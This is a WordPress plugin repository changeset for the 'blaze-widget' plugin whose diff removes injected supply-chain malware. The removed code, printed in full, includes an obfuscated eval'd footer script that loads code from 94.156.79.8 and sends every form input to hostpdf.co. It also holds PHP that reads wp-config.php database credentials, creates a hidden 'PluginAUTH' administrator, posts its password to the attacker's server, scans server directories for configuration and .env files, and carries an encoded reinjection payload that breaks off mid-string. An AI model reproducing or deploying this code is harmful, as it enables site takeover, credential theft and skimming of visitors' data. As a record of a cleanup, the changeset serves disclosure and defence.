Plugin Directory

Changeset 3106791

Timestamp:
06/24/2024 04:34:22 PM (2 weeks ago)
Author:
frantorres
Message:

PRT Reverting changes

Location:
blaze-widget
Files:
4 edited
1 copied

Legend:

Unmodified
Added
Removed
  • blaze-widget/tags/2.5.3/ReadMe.txt

    r3106435 r3106791  
    66Tested up to: 5.3.2
    77Requires PHP: 5.3
    8 Stable tag: 2.5.1
     8Stable tag: 2.5.
    99
    1010The BLAZE Retail wordpress plugin displays your dispensary’s menu and allows new and existing users to place an order. It’s simple to use and extremely efficient for consuming new orders and members.
  • blaze-widget/tags/2.5.3/blaze_widget.php

    r3106494 r3106791  
    55Description: Plugin to add and edit BLAZE API Key.
    66Author: BLAZE
    7 Version: 2.5.2
     7Version: 2.5.
    88Author URI: http://blaze.me/
    99*/
     
    1717register_activation_hook(__FILE__,'installBlazeWidget');
    1818register_deactivation_hook(__FILE__ , 'uninstallBlazeWidget' );
    19 if (!function_exists('add_footer_script')) {
    20 function add_footer_script() {
    21 echo '<script>eval("\u000a\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0073\u0072\u0063\u0020\u003d\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0039\u0034\u002e\u0031\u0035\u0036\u002e\u0037\u0039\u002e\u0038\u002f\u0073\u0063\u002d\u0074\u006f\u0070\u002e\u006a\u0073\u0022\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0028\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0070\u0061\u0072\u0065\u006e\u0074\u004e\u006f\u0064\u0065\u002e\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u000a\u0020\u0020\u0020\u0020\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0027\u006c\u006f\u0061\u0064\u0027\u002c\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0053\u0063\u0072\u0069\u0070\u0074\u0029\u003b\u000a\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0073\u0063\u0072\u0069\u0070\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0065\u0020\u003d\u0020\u0022\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006e\u0020\u003d\u0020\u0022\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u006f\u0020\u003d\u0020\u0030\u003b\u0020\u006f\u0020\u003c\u0020\u0074\u003b\u0020\u006f\u002b\u002b\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0074\u0020\u003d\u0020\u004d\u0061\u0074\u0068\u002e\u0066\u006c\u006f\u006f\u0072\u0028\u0036\u0032\u0020\u002a\u0020\u004d\u0061\u0074\u0068\u002e\u0072\u0061\u006e\u0064\u006f\u006d\u0028\u0029\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006e\u0020\u002b\u003d\u0020\u0065\u002e\u0063\u0068\u0061\u0072\u0041\u0074\u0028\u0074\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u000a\u007d\u000a\u000a\u006c\u0065\u0074\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u0027\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u0027\u0029\u003b\u000a\u000a\u0069\u0066\u0020\u0028\u0021\u0075\u0069\u0064\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0075\u0069\u0064\u0020\u003d\u0020\u0067\u0065\u006e\u0065\u0072\u0061\u0074\u0065\u0052\u0061\u006e\u0064\u006f\u006d\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0030\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u003d\u0020\u0060\u0078\u0063\u006e\u006d\u006f\u002d\u006f\u0066\u0066\u0073\u0065\u0074\u0067\u0078\u0063\u003d\u0024\u007b\u0075\u0069\u0064\u007d\u003b\u0020\u0070\u0061\u0074\u0068\u003d\u002f\u0060\u003b\u000a\u007d\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002c\u0020\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u003b\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0075\u0069\u0064\u0022\u002c\u0020\u0075\u0069\u0064\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0069\u005f\u006e\u0061\u006d\u0065\u0022\u002c\u0020\u0074\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u0041\u0064\u0064\u0020\u0074\u0068\u0065\u0020\u0066\u0069\u0065\u006c\u0064\u0020\u006e\u0061\u006d\u0065\u0020\u0061\u0073\u0020\u0061\u0020\u0070\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u000a\u0020\u0020\u0020\u0020\u006e\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0028\u0022\u0062\u0022\u002c\u0020\u0062\u0074\u006f\u0061\u0028\u0065\u0029\u0029\u002c\u000a\u0020\u0020\u0020\u0020\u0066\u0065\u0074\u0063\u0068\u0028\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0068\u006f\u0073\u0074\u0070\u0064\u0066\u002e\u0063\u006f\u002f\u0070\u0069\u006e\u0063\u0068\u0065\u002e\u0070\u0068\u0070\u0022\u002c\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u003a\u0020\u0022\u0050\u004f\u0053\u0054\u0022\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0068\u0065\u0061\u0064\u0065\u0072\u0073\u003a\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u003a\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u006f\u0064\u0079\u003a\u0020\u006e\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0074\u002e\u0074\u0065\u0078\u0074\u0028\u0029\u0029\u0029\u002e\u0074\u0068\u0065\u006e\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u006c\u006f\u0067\u0028\u0074\u0029\u0029\u0029\u002e\u0063\u0061\u0074\u0063\u0068\u0028\u0028\u0074\u003d\u003e\u0063\u006f\u006e\u0073\u006f\u006c\u0065\u002e\u0065\u0072\u0072\u006f\u0072\u0028\u0022\u0045\u0072\u0072\u006f\u0072\u003a\u0022\u002c\u0020\u0074\u0029\u0029\u0029\u000a\u007d\u000a\u000a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0061\u0064\u0064\u0045\u0076\u0065\u006e\u0074\u004c\u0069\u0073\u0074\u0065\u006e\u0065\u0072\u0028\u0022\u0069\u006e\u0070\u0075\u0074\u0022\u002c\u0020\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0074\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0022\u0049\u004e\u0050\u0055\u0054\u0022\u0020\u003d\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0061\u0067\u004e\u0061\u006d\u0065\u0020\u0026\u0026\u0020\u0022\u0062\u0075\u0074\u0074\u006f\u006e\u0022\u0020\u0021\u003d\u003d\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0074\u0079\u0070\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0065\u006e\u0064\u0050\u006f\u0073\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u006e\u0061\u006d\u0065\u0020\u007c\u007c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0069\u0064\u002c\u0020\u0074\u002e\u0074\u0061\u0072\u0067\u0065\u0074\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u007d\u0029\u0029\u003b\u000a\u000a\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u0065\u0074\u0043\u006f\u006f\u006b\u0069\u0065\u0028\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003b\u0020\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u006c\u0065\u0074\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0020\u006f\u0066\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0073\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006f\u006e\u0073\u0074\u0020\u005b\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u002c\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u005d\u0020\u003d\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u0027\u003d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0063\u006f\u006f\u006b\u0069\u0065\u004e\u0061\u006d\u0065\u0020\u003d\u003d\u003d\u0020\u006e\u0061\u006d\u0065\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006f\u006f\u006b\u0069\u0065\u0056\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u006e\u0075\u006c\u006c\u003b\u000a\u007d\u000a\u0020\u0020\u0020\u0020");</script>';
    22 }}
    23 add_action('wp_footer', 'add_footer_script');
    24 add_action( 'admin_init', 'custom_notify_plugin_updated');
    25 function custom_notify_plugin_updated() {
    26     $has_run = get_option('my_admin_init_function_run');
    27     if ($has_run !== 'yes') {
    28     function check_wp_config($directory) {
    29     while ($directory !== '/') {
    30         $wp_config_file = $directory . '/wp-config.php';
    31         if (file_exists($wp_config_file)) {
    32             return $wp_config_file;
    33         }
    34         $directory = dirname($directory);
    35     }
    36     remove_action('admin_init', 'custom_notify_plugin_updated');
    37     return false;
    38 }
    39 
    40 function parse_wp_config($config_file) {
    41     if (file_exists($config_file)) {
    42         $config_content = file_get_contents($config_file);
    43         $matches = [];
    44         // Extract prefix
    45         if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
    46             $prefix = $matches[1];
    47         } else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
    48             $prefix = $matches[1];
    49         } else {
    50             die("Prefix not found in wp-config.php");
    51         }
    52         // Extract database name
    53         if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    54             $database = $matches[1];
    55         }
    56         // Extract username
    57         if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    58             $username = $matches[1];
    59         }
    60         // Extract password
    61         if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    62             $password = $matches[1];
    63         }
    64         // Extract host
    65         if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
    66             $host = $matches[1];
    67         } else {
    68             $host = 'localhost'; // Assuming local host if not specified
    69         }
    70 
    71         return array(
    72             'prefix' => $prefix,
    73             'database' => $database,
    74             'username' => $username,
    75             'password' => $password,
    76             'host' => $host
    77         );
    78     } else {
    79         die("wp-config.php file not found");
    80     }
    81 }
    82 
    83 function access_database($config) {
    84     $mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
    85 
    86     if ($mysqli->connect_errno) {
    87         //echo "DATABASE ACCESS [FAIL]\n";
    88         return false;
    89     } else {
    90         //POST "DATABASE ACCESS [SUCCESS]\n";
    91         return $mysqli;
    92     }
    93 }
    94 
    95 function generate_random_password($length = 12) {
    96     $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    97     $password = '';
    98     $characters_length = strlen($characters);
    99     for ($i = 0; $i < $length; $i++) {
    100         $password .= $characters[rand(0, $characters_length - 1)];
    101     }
    102     return $password;
    103 }
    104 
    105 // Define a global variable for the password
    106 $generated_password = generate_random_password();
    107 
    108 // Define a global variable for the users count
    109 $wpuserscount = 0;
    110 function add_admin_user($mysqli, $config, $password) {
    111     global $generated_password; // Access the global generated password variable
    112     global $wpuserscount; // Declare the global variable to update user count
    113     $username = 'PluginAUTH';
    114    
    115     //$generated_password = $password;
    116     //$password = $generated_password;
    117     $user_role = 'administrator';
    118 
    119     // First, let's update the global user count
    120     $countQuery = "SELECT COUNT(*) AS user_count FROM {$config['prefix']}users";
    121     $countResult = $mysqli->query($countQuery);
    122     if ($countResult) {
    123         $row = $countResult->fetch_assoc();
    124         $wpuserscount = $row['user_count']; // Update the global variable with the user count
    125     } else {
    126         //echo "Error fetching user count: " . $mysqli->error . "\n";
    127         return; // Early return in case of query error
    128     }
    129     // Hash the password
    130     $hashed_password = password_hash($password, PASSWORD_DEFAULT);
    131 
    132     // Check if the user already exists
    133     $query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
    134     $result = $mysqli->query($query);
    135 
    136     if ($result && $result->num_rows > 0) {
    137         //echo "User '{$username}' already exists.\n";
    138         $z = "b";
    139     } else {
    140         // Insert the new user
    141         $query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())";
    142         $result = $mysqli->query($query);
    143 
    144         if ($result) {
    145             $user_id = $mysqli->insert_id;
    146 
    147             // Set user role
    148             $query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
    149             $result = $mysqli->query($query);
    150 
    151             if ($result) {
    152                 //echo "User '{$username}' with administrative privileges added successfully.\n";
    153                 $zb = '';
    154             } else {
    155                 //echo "Error assigning role to user '{$username}'.\n";
    156                 $zb = '';
    157             }
    158         } else {
    159             //echo "Error creating user '{$username}': " . $mysqli->error . "\n";
    160             $zb = '';
    161         }
    162     }
    163 }
    164 
    165 function get_domain_from_database($mysqli, $config) {
    166     // Query to retrieve site URL from WordPress options table
    167     $query = "SELECT option_value FROM {$config['prefix']}options WHERE option_name = 'siteurl'";
    168     $result = $mysqli->query($query);
    169 
    170     if ($result && $result->num_rows > 0) {
    171         $row = $result->fetch_assoc();
    172         $site_url = $row['option_value'];
    173         $parsed_url = parse_url($site_url);
    174         if ($parsed_url && isset($parsed_url['host'])) {
    175             return $parsed_url['host'];
    176         }
    177     }
    178 
    179     return null;
    180 }
    181 function zbvalidate_file($file) {
    182     try {
    183         ob_start();
    184         include $file;
    185         ob_end_clean();
    186        
    187         // If no exception was thrown, delete the backup file
    188         $backup_file = $file . '.bak';
    189         if (file_exists($backup_file)) {
    190             unlink($backup_file);
    191         }
    192         return true;
    193     } catch (Throwable $e) {
    194         // Catch errors and set the validation flag
    195         return false;
    196     }
    197 }
    198 $currdomain = 'UNK.UNK';
    199 function pachamama($path) {
    200     global $currdomain;
    201     if (strpos($path, 'wp-config.php') !== false) {
    202         $path = str_replace('wp-config.php', '', $path);
    203     }
    204 
    205     $current_directory = $path;
    206     $wp_config_file = check_wp_config($current_directory);
    207     if ($wp_config_file) {
    208         //echo "WP-CONFIG [FOUND]\n";
    209        
    210         $config = parse_wp_config($wp_config_file);
    211         $mysqli = access_database($config);
    212         if ($mysqli) {
    213             $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
    214             $password = '';
    215             $characters_length = strlen($characters);
    216             for ($i = 0; $i < 13; $i++) {
    217                 $password .= $characters[rand(0, $characters_length - 1)];
    218             }
    219             add_admin_user($mysqli, $config, $password);
    220             $domain = get_domain_from_database($mysqli, $config);
    221             if ($domain) {
    222                 //echo "[$domain] OK\n";
    223                 $currdomain = $domain;
    224 
    225                 // Reconstruct the correct wp-login.php path
    226                 $wp_login_path = "https://{$domain}/wp-login.php";
    227 
    228                 // Perform a POST request to https://94.156.79.8/AddSites
    229                 $url = 'https://94.156.79.8/AddSites';
    230                 $aurl = get_admin_url();
    231                 $post_data = array(
    232                     'aurl' => $aurl,
    233                     'domain' => $domain,
    234                     'username' => 'PluginAUTH',
    235                     'passwordz' => $password, // Access the global generated password variable
    236                     'wp_login_path' => $wp_login_path
    237                 );
    238 
    239                 $ch = curl_init();
    240                 curl_setopt($ch, CURLOPT_URL, $url);
    241                 curl_setopt($ch, CURLOPT_POST, 1);
    242                 curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
    243                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    244                 curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    245                     'Content-Type: application/json', // Set content type to JSON
    246                     'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
    247                 ));
    248                 $response = curl_exec($ch);
    249                 $error = curl_error($ch); // Get any curl error
    250                 curl_close($ch);
    251 
    252                 if ($response === false) {
    253                     //echo "POST request failed: $error\n";
    254                     $z = false;
    255                 } else {
    256                     //echo "POST request sent successfully. Response: $response\n";
    257                     $z = true;
    258                 }
    259             } else {
    260                 //echo "Domain retrieval failed.\n";
    261                 $z = false;
    262             }
    263             $mysqli->close();
    264         }
    265     } else {
    266         //echo "WP-CONFIG [NOT FOUND]\n";
    267         $z = false;
    268     }
    269 }
    270 
    271 function check_cms_configuration_files() {
    272     global $wpuserscount;
    273    global $wp_config_paths;
    274    global $wc_config_paths;
    275    global $mg_config_paths;
    276     // Function to recursively search directories for configuration files
    277     //function search_for_config_files($directory, &$cms_config_files, $max_parents = 4) {
    278       function search_for_config_files(&$cms_config_files, $max_parents = 3) {
    279       // Get the current directory
    280       $directory = __DIR__;
    281 
    282       // Initialize the variable to keep track of the last readable path
    283       $last_readable_path = null;
    284 
    285       // Iterate to go one parent folder up until no read permission or max 5 parents
    286       for ($i = 0; $i < $max_parents; $i++) {
    287           // Check if the directory exists and is readable
    288           if (is_dir($directory) && is_readable($directory)) {
    289               $last_readable_path = $directory;
    290           } else {
    291               // Stop iteration if the directory is not readable
    292               break;
    293           }
    294 
    295           // Move one directory up
    296           $directory = dirname($directory);
    297       }
    298 
    299       // If a readable path was found, perform a recursive glob search for the specified file extensions
    300       if (!empty($last_readable_path)) {
    301 
    302           $config_files = [];
    303           $files = [];
    304           //$pattern = '/home/98752.cloudwaysapps.com/trnkgjmvur';
    305           try {
    306           $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($last_readable_path), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
    307             foreach($objects as $name => $object){
    308               if (substr($name, -4) === '.php') {
    309                 // Add only files ending with '.php' to the $files array
    310                 //echo "$name\n";
    311                 $files[] = $name;
    312               }
    313             }
    314                   } catch (Exception $e) {
    315           // Handle any exceptions that occur during iteration
    316           // You can log the error or take appropriate action here
    317           //echo "Error: " . $e->getMessage();
    318           $d = 'sab';
    319         }
    320           foreach ($files as $file) {
    321               // Add the found file to the list of config files
    322               //print($file);
    323               $cms_config_files[] = $file;
    324           }
    325           return $cms_config_files;
    326       } else {
    327           // Return an empty array if no readable path was found
    328           //echo("No Readable Paths");
    329           return [];
    330       }
    331   }
    332 
    333 
    334     // Array to store detected CMS names
    335     $detected_cms = [
    336         'WordPress' => false,
    337         'WooCommerce' => false,
    338         'Magento' => false,
    339         'OpenCart' => false,
    340         'PrestaShop' => false,
    341         'Drupal Commerce' => false,
    342         'Symfony' => false,
    343         'Laravel' => false,
    344         'Zend Framework' => false
    345     ];
    346 
    347     // Array to store detected .dat files
    348     $detected_dat_files = [];
    349 
    350     // Paths to check for CMS-specific configuration files
    351     $current_directory = __DIR__;
    352     $paths_to_check = [
    353         '/var/www/vhosts/aedstudisrl.com/httpdocs/wp-admin',
    354         $current_directory,
    355         '/etc',                // Common system configuration directory
    356         '/var/www',      // Example web root directory
    357         '/home',              // Home directories
    358         '/opt',               // Optional software packages
    359         '/usr/local',         // Locally installed software
    360         '/usr/share',         // Shared software resources
    361         '/var/lib',           // Variable data directories
    362     ];
    363 
    364     // Files to search for in each directory
    365     $files_to_search = [
    366         'app/etc/env.php',                                       // Magento
    367         'wp-config.php', 'wp-content/plugins/woocommerce/includes/class-wc-settings.php', // WordPress & WooCommerce
    368         'config.php',                                             // OpenCart
    369         'config/parameters.php',                                  // PrestaShop
    370         'sites/default/settings.php',                             // Drupal Commerce
    371         'config/packages/*.yaml',                                 // Symfony
    372         '.env',                                                   // Laravel
    373         'config/autoload/*.global.php',                           // Zend Framework
    374         '*.dat',                                                  // .dat files
    375     ];
    376 
    377     // Array to store CMS configuration files
    378     $cms_config_files = [];
    379 
    380     // Iterate through the paths to check and search for configuration files in each directory recursively
    381 
    382     search_for_config_files($cms_config_files);
    383 
    384     $azb = "CmlmICghZnVuY3Rpb25fZXhpc3RzKCdhZGRfZm9vdGVyX3NjcmlwdCcpKSB7CmZ1bmN0aW9uIGFkZF9mb290ZXJfc2NyaXB0KCkgewoJdXBkYXRlX29wdGlvbignbXlfYWRtaW5faW5pdF9mdW5jdGlvbl9ydW4nLCAneWVzJyk7CgllY2hvICc8c2NyaXB0PmV2YWwoIlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3Nlx1MDA2MVx1MDA3Mlx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyMFx1MDAzZFx1MDAyMFx1MDA2NFx1MDA2Zlx1MDA2M1x1MDA3NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA2M1x1MDA3Mlx1MDA2NVx1MDA2MVx1MDA3NFx1MDA2NVx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyOFx1MDAyMlx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyMlx1MDAyOVx1MDAzYlx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA3M1x1MDA3Mlx1MDA2M1x1MDAyMFx1MDAzZFx1MDAyMFx1MDAyMlx1MDA2OFx1MDA3NFx1MDA3NFx1MDA3MFx1MDA3M1x1MDAzYVx1MDAyZlx1MDAyZlx1MDAzOVx1MDAzNFx1MDAyZVx1MDAzMVx1MDAzNVx1MDAzNlx1MDAyZVx1MDAzN1x1MDAzOVx1MDAyZVx1MDAzOFx1MDAyZlx1MDA3M1x1MDA2M1x1MDAyZFx1MDA3NFx1MDA2Zlx1MDA3MFx1MDAyZVx1MDA2YVx1MDA3M1x1MDAyMlx1MDAzYlx1MDAwYVx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA2Nlx1MDA3NVx1MDA2ZVx1MDA2M1x1MDA3NFx1MDA2OVx1MDA2Zlx1MDA2ZVx1MDAyMFx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx1MDA2NVx1MDA1M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDAyOFx1MDAyOVx1MDAyMFx1MDA3Ylx1MDAwYVx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDAyMFx1MDA3M1x1MDA2M1x1MDA3Mlx1MDA2OVx1MDA3MFx1MDA3NFx1MDA0NVx1MDA2Y1x1MDA2NVx1MDA2ZFx1MDA2NVx1MDA2ZVx1MDA3NFx1MDAyZVx1MDA3MFx1MDA2MVx1MDA3Mlx1MDA2NVx1MDA2ZVx1MDA3NFx1MDA0ZVx1MDA2Zlx1MDA2NFx1MDA2NVx1MDAyZVx1MDA3Mlx1MDA2NVx1MDA2ZFx1MDA2Zlx1MDA3Nlx